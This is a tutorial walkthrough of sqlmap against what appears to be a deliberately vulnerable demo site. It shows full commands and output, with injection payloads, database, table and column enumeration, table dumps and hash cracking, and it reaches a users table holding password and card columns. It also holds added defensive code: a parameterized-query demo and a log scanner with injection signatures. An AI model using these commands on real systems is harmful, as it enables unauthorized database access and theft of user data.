SQLMap
Hi!
Hello everyone!
SQLMap is a tool for automating the exploitation of SQL injection vulnerabilities.
To have the latest version, and therefore be able to use all of its features, we download it with svn:
root@bt:/pentest/database/sqlmap# svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
We now have the latest version of SQLMap.
Now we will start with a test.
First we need to find a vulnerable web page, one that also allows injection and lets us extract information.
Let's begin:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1
sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:36:55
[16:36:55] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:36:55] [INFO] resuming injection data from session file
[16:36:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:36:55] [INFO] testing connection to the target url
[16:36:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
[16:36:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:36:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'
[*] shutting down at 16:36:56
I have highlighted important information in red.
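Why the `cat` parameter reported above is injectable, and how the query should be written instead, as an added example that is not from the original post. It uses Python's sqlite3 as a stand-in for the site's PHP/MySQL code; the sample rows and all function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the shop database (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pictures (pic_id INTEGER, cat_id INTEGER, title TEXT)")
    db.executemany(
        "INSERT INTO pictures VALUES (?, ?, ?)",
        [(1, 1, "The shore"), (2, 1, "Mistery"), (6, 2, "Thing")],
    )
    return db


def list_products_vulnerable(db, cat):
    # The request parameter is pasted into the SQL text, so everything the
    # client sends after the number becomes part of the WHERE clause.
    query = "SELECT title FROM pictures WHERE cat_id = " + cat + " ORDER BY pic_id"
    return [row[0] for row in db.execute(query)]


def list_products_safe(db, cat):
    # Reject anything that is not a plain integer, then bind the value as a
    # parameter so it can never be parsed as SQL.
    if not (cat.isascii() and cat.isdigit()):
        raise ValueError("cat must be a non-negative integer")
    query = "SELECT title FROM pictures WHERE cat_id = ? ORDER BY pic_id"
    return [row[0] for row in db.execute(query, (int(cat),))]


def behaves_like_boolean_oracle(handler, db):
    """Regression check: does an appended TRUE/FALSE condition change the result?

    A handler that answers differently for the two conditions is what the
    'boolean-based blind' finding in the sqlmap output describes.
    """
    def run(value):
        try:
            return handler(db, value)
        except ValueError:
            return "rejected"

    baseline = run("1")
    when_true = run("1 AND 1192=1192")   # payload shown in the sqlmap output
    when_false = run("1 AND 1192=1193")  # constructed always-false counterpart
    return when_true == baseline and when_false != baseline


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler is an oracle:",
          behaves_like_boolean_oracle(list_products_vulnerable, db))
    print("parameterized handler is an oracle:",
          behaves_like_boolean_oracle(list_products_safe, db))
```

The same check can run in a test suite against each handler that takes a request parameter, so a regression to string concatenation is caught before deployment.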
We can see that it is vulnerable, so now we will extract both the users and the databases:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 --dbs --users
sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:41:00
[16:41:00] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:41:00] [INFO] resuming injection data from session file
[16:41:00] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:41:00] [INFO] testing connection to the target url
[16:41:01] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
[16:41:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:41:01] [INFO] fetching database users
database management system users [1]:
[*] 'acuart'@'localhost'
[16:41:01] [INFO] fetching database names
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop
[16:41:01] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'
[*] shutting down at 16:41:01
Highlighted in red is the information about the databases, as well as the user.
Now we will list the tables of a specific database:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --tables
sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:46:44
[16:46:44] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:46:44] [INFO] resuming injection data from session file
[16:46:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:46:45] [INFO] testing connection to the target url
[16:46:45] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
[16:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:46:45] [INFO] fetching tables for database: acuart
[16:46:45] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures, acuart, users
Database: acuart
[7 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| users     |
+-----------+
[16:46:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'
[*] shutting down at 16:46:45
Now that we have the tables, we will go after the columns:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --columns
sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:50:28
[16:50:28] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:50:28] [INFO] resuming injection data from session file
[16:50:28] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:50:29] [INFO] testing connection to the target url
[16:50:29] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
[16:50:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:50:29] [INFO] fetching tables for database: acuart
[16:50:29] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures, acuart, users
[16:50:29] [INFO] fetching columns for table 'guestbook' on database 'acuart'
[16:50:29] [INFO] fetching columns for table 'carts' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'categ' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'featured' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'artists' on database 'acuart'
[16:50:31] [INFO] fetching columns for table 'pictures' on database 'acuart'
[16:50:31] [INFO] fetching columns for table 'users' on database 'acuart'
Database: acuart
Table: categ
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| cat_id | int(5)      |
| cdesc  | tinytext    |
| cname  | varchar(50) |
+--------+-------------+
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+
Database: acuart
Table: carts
[3 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| cart_id | varchar(100) |
| item    | int(11)      |
| price   | int(11)      |
+---------+--------------+
Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| a_id   | int(11)      |
| cat_id | int(11)      |
| img    | varchar(50)  |
| pic_id | int(5)       |
| plong  | text         |
| price  | int(11)      |
| pshort | mediumtext   |
| title  | varchar(100) |
+--------+--------------+
Database: acuart
Table: featured
[2 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| feature_text | text    |
| pic_id       | int(11) |
+--------------+---------+
Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int(5)      |
+-----------+-------------+
Database: acuart
Table: guestbook
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| mesaj    | text         |
| sender   | varchar(150) |
| senttime | int(32)      |
+----------+--------------+
[16:50:31] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'
[*] shutting down at 16:50:31
We now have the information about the columns.
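How the four injection techniques listed in the output above look from the server side, as an added detection example that is not part of the original post. The access-log lines are constructed (documentation IP ranges, shortened payloads, and an assumed sqlmap User-Agent string built from the banner version), and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# One signature per technique named in the sqlmap report, plus schema access.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "union-query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "schema-enumeration": re.compile(r"\bINFORMATION_SCHEMA\b", re.I),
}

# Constructed sample log; the UA format is an assumption.
SQLMAP_UA = "sqlmap/1.0-dev (r4356) (http://www.sqlmap.org)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64)"
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Oct/2011:16:30:01 +0000] "GET /listproducts.php?cat=1 '
    'HTTP/1.1" 200 4521 "-" "' + BROWSER_UA + '"',
    '203.0.113.7 - - [10/Oct/2011:16:36:55 +0000] "GET /listproducts.php?cat=1 '
    'HTTP/1.1" 200 4521 "-" "' + SQLMAP_UA + '"',
    '203.0.113.7 - - [10/Oct/2011:16:36:56 +0000] "GET /listproducts.php?'
    'cat=1%20AND%201192%3D1192 HTTP/1.1" 200 4521 "-" "' + SQLMAP_UA + '"',
    '203.0.113.7 - - [10/Oct/2011:16:36:57 +0000] "GET /listproducts.php?'
    'cat=1%20AND%20%28SELECT%205536%20FROM%28SELECT%20COUNT%28%2A%29%2C'
    'FLOOR%28RAND%280%29%2A2%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS'
    '%20GROUP%20BY%20x%29a%29 HTTP/1.1" 200 812 "-" "' + SQLMAP_UA + '"',
    '203.0.113.7 - - [10/Oct/2011:16:36:58 +0000] "GET /listproducts.php?'
    'cat=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1" '
    '200 4600 "-" "' + SQLMAP_UA + '"',
    '203.0.113.9 - - [10/Oct/2011:16:40:12 +0000] "GET /listproducts.php?'
    'cat=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 4521 "-" "' + BROWSER_UA + '"',
    '198.51.100.20 - - [10/Oct/2011:16:41:00 +0000] "GET /search.php?'
    'q=rock%20and%20roll HTTP/1.1" 200 2048 "-" "' + BROWSER_UA + '"',
]


def classify_value(value):
    """Return the names of all signatures found in one decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan(lines):
    """Return one finding per request that carries a payload or a tool User-Agent."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not in combined format; skip rather than guess
        hits = {}
        # parse_qsl percent-decodes each value before the signatures run.
        query = urlsplit(m["target"]).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                hits[param] = tags
        tool_ua = m["ua"].lower().startswith("sqlmap/")
        if hits or tool_ua:
            findings.append({"ip": m["ip"], "params": hits, "tool_ua": tool_ua})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The User-Agent is trivially changed by the client, which is why the sixth sample line is still caught on its payload alone; neither check replaces fixing the query itself.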
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --dump
sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:56:33
[16:56:33] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:56:33] [INFO] resuming injection data from session file
[16:56:33] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:56:33] [INFO] testing connection to the target url
[16:56:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
[16:56:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:56:34] [INFO] fetching tables for database: acuart
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures, acuart, users
[16:56:34] [INFO] fetching columns for table 'guestbook' on database 'acuart'
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': sender, varchar(150), mesaj, text, senttime, int(32)
[16:56:34] [INFO] fetching entries for table 'guestbook' on database 'acuart'
[16:56:35] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
[16:56:35] [WARNING] the SQL query provided does not return any output
Database: acuart
Table: guestbook
[0 entries]
+-------+--------+----------+
| mesaj | sender | senttime |
+-------+--------+----------+
+-------+--------+----------+
[16:56:35] [INFO] Table 'acuart.guestbook' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/guestbook.csv'
[16:56:35] [INFO] fetching columns for table 'carts' on database 'acuart'
[16:56:35] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cart_id, varchar(100), price, int(11), item, int(11)
[16:56:35] [INFO] fetching entries for table 'carts' on database 'acuart'
recognized possible password hashes in column cart_id. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:56:51] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
[16:57:04] [INFO] using default dictionary
[16:57:04] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!)
[y/N] n
[16:57:10] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:57:46] [WARNING] no clear password(s) found
Database: acuart
Table: carts
[43 entries]
[16:57:46] [INFO] Table 'acuart.carts' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/carts.csv'
[16:57:46] [INFO] fetching columns for table 'categ' on database 'acuart'
[16:57:46] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cat_id, int(5), cname, varchar(50), cdesc, tinytext
[16:57:46] [INFO] fetching entries for table 'categ' on database 'acuart'
Database: acuart
Table: categ
[4 entries]
[16:57:48] [INFO] Table 'acuart.categ' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/categ.csv'
[16:57:48] [INFO] fetching columns for table 'featured' on database 'acuart'
[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id, int(11), feature_text, text
[16:57:48] [INFO] fetching entries for table 'featured' on database 'acuart'
[16:57:48] [WARNING] the SQL query provided does not return any output
Database: acuart
Table: featured
[0 entries]
+--------------+--------+
| feature_text | pic_id |
+--------------+--------+
+--------------+--------+
[16:57:48] [INFO] Table 'acuart.featured' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/featured.csv'
[16:57:48] [INFO] fetching columns for table 'artists' on database 'acuart'
[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': artist_id, int(5), aname, varchar(50), adesc, text
[16:57:48] [INFO] fetching entries for table 'artists' on database 'acuart'
Database: acuart
Table: artists
[3 entries]
[16:57:49] [INFO] Table 'acuart.artists' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/artists.csv'
[16:57:49] [INFO] fetching columns for table 'pictures' on database 'acuart'
[16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id, int(5), pshort, mediumtext, plong, text, price, int(11), cat_id, int(11), a_id, int(11), title, varchar(100), img, varchar(50)
[16:57:49] [INFO] fetching entries for table 'pictures' on database 'acuart'
Database: acuart
Table: pictures
[7 entries]
| The universe | +------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+ [16:57:49] [INFO] Table 'acuart.pictures' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix. com/dump/acuart/pictures.csv' [16:57:49] [INFO] fetching columns for table 'users' on database 'acuart' [16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': uname, varchar(100), pass, varchar(100), cc, varchar(100), address, mediumtext, email, varchar(100), name, varchar(100) , phone, varchar(100), cart, varchar(100) [16:57:49] [INFO] fetching entries for table 'users' on database 'acuart' [16:58:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request ^C [17:01:59] [ERROR] user aborted [*] shutting down at 17:01:59
Once again, the extracted information is shown in red.
That concludes this short overview of SQLMap.
Regards